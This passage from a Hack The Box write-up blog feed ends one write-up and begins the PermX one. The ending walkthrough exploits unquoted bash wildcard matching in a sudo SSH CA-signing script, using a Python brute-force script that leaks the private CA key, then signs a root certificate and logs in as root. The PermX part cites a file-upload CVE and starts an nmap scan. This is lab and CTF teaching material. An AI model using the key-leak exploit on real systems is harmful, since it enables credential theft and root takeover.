&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>usage &lt;span style="color:#fe8019">()&lt;/span> &lt;span style="color:#fe8019">{&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Usage: &lt;/span>$0&lt;span style="color:#b8bb26"> &amp;lt;ca_file&amp;gt; &amp;lt;public_key_file&amp;gt; &amp;lt;username&amp;gt; &amp;lt;principal&amp;gt; &amp;lt;serial&amp;gt;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">exit&lt;/span> &lt;span style="color:#d3869b">1&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">}&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">[&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$#&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> -ne &lt;span style="color:#d3869b">5&lt;/span> &lt;span style="color:#fe8019">]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> usage
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ca_file&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$1&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>public_key_file&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$2&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>username&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$3&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>principal&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$4&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>serial&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$5&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">[&lt;/span> ! -f &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$ca_file&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> &lt;span style="color:#fe8019">]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Error: CA file &amp;#39;&lt;/span>$ca_file&lt;span style="color:#b8bb26">&amp;#39; not found.&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> usage
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">[[&lt;/span> $ca &lt;span style="color:#fe8019">==&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;/etc/ssh/ca-it&amp;#34;&lt;/span> &lt;span style="color:#fe8019">]]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Error: Use API for signing with this CA.&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> usage
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>itca&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">$(&lt;/span>cat /etc/ssh/ca-it&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ca&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">$(&lt;/span>cat &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$ca_file&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">[[&lt;/span> $itca &lt;span style="color:#fe8019">==&lt;/span> $ca &lt;span style="color:#fe8019">]]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Error: Use API for signing with this CA.&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> usage
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">[&lt;/span> ! -f &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$public_key_file&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> &lt;span style="color:#fe8019">]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Error: Public key file &amp;#39;&lt;/span>$public_key_file&lt;span style="color:#b8bb26">&amp;#39; not found.&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> usage
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>supported_principals&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;webserver,analytics,support,security&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>IFS&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;,&amp;#39;&lt;/span> &lt;span style="color:#fabd2f">read&lt;/span> -ra principal &lt;span style="color:#fe8019">&amp;lt;&amp;lt;&amp;lt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$principal_str&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">for&lt;/span> word in &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#b8bb26">${&lt;/span>principal[@]&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>; &lt;span style="color:#fe8019">do&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> ! &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$supported_principals&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> | grep -qw &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$word&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Error: &amp;#39;&lt;/span>$word&lt;span style="color:#b8bb26">&amp;#39; is not a supported principal.&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Choose from:&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34; webserver - external web servers - webadmin user&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34; analytics - analytics team databases - analytics user&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34; support - IT support server - support user&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34; security - SOC servers - support user&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> usage
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">done&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> ! &lt;span style="color:#fe8019">[[&lt;/span> $serial &lt;span style="color:#fe8019">=&lt;/span>~ ^&lt;span style="color:#fe8019">[&lt;/span>0-9&lt;span style="color:#fe8019">]&lt;/span>+$ &lt;span style="color:#fe8019">]]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Error: &amp;#39;&lt;/span>$serial&lt;span style="color:#b8bb26">&amp;#39; is not a number.&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> usage
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ssh-keygen -s &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$ca_file&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> -z &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$serial&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> -I &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$username&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> -V -1w:forever -n &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$principals&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$public_key_name&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>This is similar to the previous script, but in here instead of using API, we can directly provide the &lt;code>ca_file&lt;/code>. There&amp;rsquo;s an if statement that checks if the provided &lt;code>ca_file&lt;/code> is &lt;code>/etc/ssh/ca-it&lt;/code>, if it is true then it will print the usage and exit.&lt;/p>
&lt;p>&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020241129224415.webp" alt="">
The one thing to notice here is that the script first reads the content of both &lt;code>/etc/ssh/ca-it&lt;/code> and the file we provide and tries to match the content. And specifically in that line:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">[[&lt;/span> $itca &lt;span style="color:#fe8019">==&lt;/span> $ca &lt;span style="color:#fe8019">]]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>It tries to match the content without surrounding the variables in quotest &lt;code>&amp;quot;&lt;/code>, which makes it possible to pattern match. Let&amp;rsquo;s explain that with an example:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>pass&lt;span style="color:#fe8019">=&lt;/span>$1
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>root_pass&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;secretpass&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">[[&lt;/span> $root_pass &lt;span style="color:#fe8019">==&lt;/span> $pass &lt;span style="color:#fe8019">]]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Access granted!&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">else&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Wrong password!&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Here when we enter &lt;code>*&lt;/code> as the password, the script will match it with the password and we can easily bypass the check.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020241129205356.webp" alt="">&lt;p>In this example th password is hardcoded inside the script. Now what if the script have suid bit set and reads the password from another file which only the root user have permission to. Another thing we can try is exfiltrate the password by exploiting this wilcard matching.
For example we can try to find the first letter by trying all the letter one by one and add &lt;code>*&lt;/code> at the end. Since the password here is &lt;code>secretpass&lt;/code>, the password &lt;code>a*&lt;/code> fails and &lt;code>s*&lt;/code> works.
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020241129205900.webp" alt="">&lt;/p>
&lt;p>We can keep doing this until we exfiltrate the whole password using a small script.
The same method can be applied to create a script to leak the content of &lt;code>/etc/ssh/ca-it&lt;/code> file.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-python" data-lang="python">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> string
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> subprocess
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> os
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>chars &lt;span style="color:#fe8019">=&lt;/span> string&lt;span style="color:#fe8019">.&lt;/span>ascii_uppercase &lt;span style="color:#fe8019">+&lt;/span> string&lt;span style="color:#fe8019">.&lt;/span>ascii_lowercase &lt;span style="color:#fe8019">+&lt;/span> string&lt;span style="color:#fe8019">.&lt;/span>digits &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;+/&lt;/span>&lt;span style="color:#b8bb26">\n&lt;/span>&lt;span style="color:#b8bb26">-= &amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ca &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;test-ca&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>leaked_key&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&amp;#34;-----BEGIN OPENSSH PRIVATE KEY-----
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">is_valid_ca&lt;/span>():
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> output &lt;span style="color:#fe8019">=&lt;/span> subprocess&lt;span style="color:#fe8019">.&lt;/span>run(
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">f&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;sudo /opt/sign_key.sh &lt;/span>&lt;span style="color:#b8bb26">{&lt;/span>ca&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26"> ctf-root.pub root root_user 1337&amp;#34;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> stdout&lt;span style="color:#fe8019">=&lt;/span>subprocess&lt;span style="color:#fe8019">.&lt;/span>PIPE,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> stderr&lt;span style="color:#fe8019">=&lt;/span>subprocess&lt;span style="color:#fe8019">.&lt;/span>PIPE,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> shell&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">True&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> )
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Error: Use API for signing with this CA.&amp;#34;&lt;/span> &lt;span style="color:#fe8019">in&lt;/span> output&lt;span style="color:#fe8019">.&lt;/span>stdout&lt;span style="color:#fe8019">.&lt;/span>decode()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">while&lt;/span> &lt;span style="color:#fe8019">not&lt;/span> leaked_key&lt;span style="color:#fe8019">.&lt;/span>endswith(&lt;span style="color:#b8bb26">&amp;#39;-----END OPENSSH PRIVATE KEY----&amp;#39;&lt;/span>):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">for&lt;/span> s &lt;span style="color:#fe8019">in&lt;/span> chars:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">with&lt;/span> &lt;span style="color:#fabd2f">open&lt;/span>(ca, &lt;span style="color:#b8bb26">&amp;#39;w&amp;#39;&lt;/span>) &lt;span style="color:#fe8019">as&lt;/span> f:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> f&lt;span style="color:#fe8019">.&lt;/span>write(leaked_key &lt;span style="color:#fe8019">+&lt;/span> s &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;*&amp;#39;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> is_valid_ca():
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> leaked_key &lt;span style="color:#fe8019">=&lt;/span> leaked_key &lt;span style="color:#fe8019">+&lt;/span> s
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> os&lt;span style="color:#fe8019">.&lt;/span>system(&lt;span style="color:#b8bb26">&amp;#39;clear&amp;#39;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(leaked_key)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">break&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">else&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">break&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">print&lt;/span>(leaked_key)
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now execute the script, it will take some time to leak the entire file content.
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020241129232152.webp" alt="">
Now let&amp;rsquo;s create an ssh key for root and let&amp;rsquo;s sign it using the CA.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>ssh-keygen -t rsa -f ctf-root
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ssh-keygen -s ca-root -I root -n root_user ctf-root.pub
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020241129232949.webp" alt="">
Now let&amp;rsquo;s login as root&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>ssh root@10.10.11.27 -p &lt;span style="color:#d3869b">2222&lt;/span> -i ctf-root -o CertificateFile&lt;span style="color:#fe8019">=&lt;/span>ctf-root-cert.pub
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020241129233357.webp" alt="">&lt;h3 id="reference">Reference:&lt;/h3>
&lt;ul>
&lt;li>&lt;a href="https://www.php.net/manual/en/phar.using.stream.php">&lt;code>phar://&lt;/code> wrapper&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://rudrasarkar.medium.com/exploiting-phar-stream-wrapper-d2140592c6e7">Exploiting phar stream wrapper&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://en.wikipedia.org/wiki/HAR_(file_format)">HAR&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://www.lorier.net/docs/ssh-ca.html">Certification Authority key&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://dmuth.medium.com/ssh-at-scale-cas-and-principals-b27edca3a5d">SSH at scale CAs and Principals&lt;/a>&lt;/li>
&lt;/ul></content></item><item><title>PermX | HackTheBox</title><link>https://h4r1337.github.io/posts/permx/</link><pubDate>Mon, 04 Nov 2024 20:37:42 +0530</pubDate><guid>https://h4r1337.github.io/posts/permx/</guid><description>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/permx/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/permx">PermX&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Easy&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://app.hackthebox.com/users/1573153">&lt;img src="https://www.hackthebox.com/badge/image/1573153" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;br>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About Permx
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>&lt;code>PermX&lt;/code> is an Easy Difficulty Linux machine featuring a learning management system vulnerable to unrestricted file uploads via &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2023-4220">CVE-2023-4220&lt;/a>. This vulnerability is leveraged to gain a foothold on the machine. Enumerating the machine reveals credentials that lead to SSH access. A &lt;code>sudo&lt;/code> misconfiguration is then exploited to gain a &lt;code>root&lt;/code> shell.&lt;/p></description><content>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/permx/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/permx">PermX&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Easy&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://app.hackthebox.com/users/1573153">&lt;img src="https://www.hackthebox.com/badge/image/1573153" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;br>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About Permx
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>&lt;code>PermX&lt;/code> is an Easy Difficulty Linux machine featuring a learning management system vulnerable to unrestricted file uploads via &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2023-4220">CVE-2023-4220&lt;/a>. This vulnerability is leveraged to gain a foothold on the machine. Enumerating the machine reveals credentials that lead to SSH access. A &lt;code>sudo&lt;/code> misconfiguration is then exploited to gain a &lt;code>root&lt;/code> shell.&lt;/p>
&lt;/div>
&lt;/div>
&lt;script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
&lt;/script>
&lt;h1 id="information-gathering">Information Gathering&lt;/h1>
&lt;p>Before starting, I have added &lt;code>permx.htb&lt;/code> to &lt;code>/etc/hosts&lt;/code> file&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">echo&lt;/span> -e &lt;span style="color:#b8bb26">&amp;#39;10.10.11.23\tpermx.htn&amp;#39;&lt;/span> | sudo tee -a /etc/hosts
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now let&amp;rsquo;s start with nmap scan.
Scanned all TCP ports:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>nmap -p- --min-rate &lt;span style="color:#d3869b">10000&lt;/span> -vv -oA nmap/ports 10.10.11.23
